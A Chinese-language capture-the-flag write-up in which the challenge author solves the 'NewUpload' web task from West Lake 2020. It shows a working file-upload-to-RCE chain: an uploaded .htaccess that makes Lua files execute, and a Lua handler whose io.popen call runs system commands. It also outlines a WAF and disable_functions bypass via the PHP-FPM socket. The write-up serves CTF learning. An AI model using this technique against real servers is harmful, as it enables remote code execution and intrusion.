西湖论剑2020–Web NewUpload 解题思路
2023-10-29 18:26:21 Author: www.zhaoj.in(查看原文) 阅读量:3 收藏

朝花夕拾,自己出的题,发一发。

难度:

简单

知识点:

  • 方法一:.htaccess 上传绕过
  • 方法一:Lua 基本语法 bypass disable_function
  • 方法二:宝塔 Apache WAF 绕过
  • 方法二:FPM bypass disable_function

说明:

本题有两种解法。

一种是预期解也就是利用上传 .htaccess 和 lua 文件,使 lua 文件被解析从而造成RCE。

还有一种是通过百分号 % 绕过 WAF 上传 php,然后去攻击 tmp 目录下的 sock 绕过 disable_function。

复现环境

http://newupload.xhlj.wetolink.com/

步骤:

此处主要介绍预期解的方法一。

1. 直接构造一个 .htaccess 上传,使 lua 能被解析。

SetHandler lua-script

2. 再去网上找一个 lua 的脚本,改一改。利用 lua 来执行系统命令。

require "string"


--[[
     This is the default method name for Lua handlers, see the optional
     function-name in the LuaMapHandler directive to choose a different
     entry point.
--]]
function handle(r)
    r.content_type = "text/plain"


    if r.method == 'GET' then
        local t = io.popen('/readflag')
        local a = t:read("*all")
        r:puts(a)
        for k, v in pairs( r:parseargs() ) do
            r:puts( string.format("%s: %s\n", k, v) )
        end
    elseif r.method == 'POST' then
        r:puts("Hello Lua World!\n")
        for k, v in pairs( r:parsebody() ) do
            r:puts( string.format("%s: %s\n", k, v) )
        end
    elseif r.method == 'PUT' then
-- use our own Error contents
        r:puts("Unsupported HTTP method " .. r.method)
        r.status = 405
        return apache2.OK
    else
-- use the ErrorDocument
        return 501
    end
    return apache2.OK
end

其中这一段是关键。

local t = io.popen('/readflag')
local a = t:read("*all")
r:puts(a)

让 lua 执行系统命令 /readflag 并获取回显,需要执行其他命令则修改其中的命令。

3.最后访问这个lua 文件即可执行命令获得 flag。

/sandbox/9va7eogj0ov17g4van3lp3hel1/upload/glzjin.lua


文章来源: https://www.zhaoj.in/read-8854.html
如有侵权请联系:admin#unsafe.sh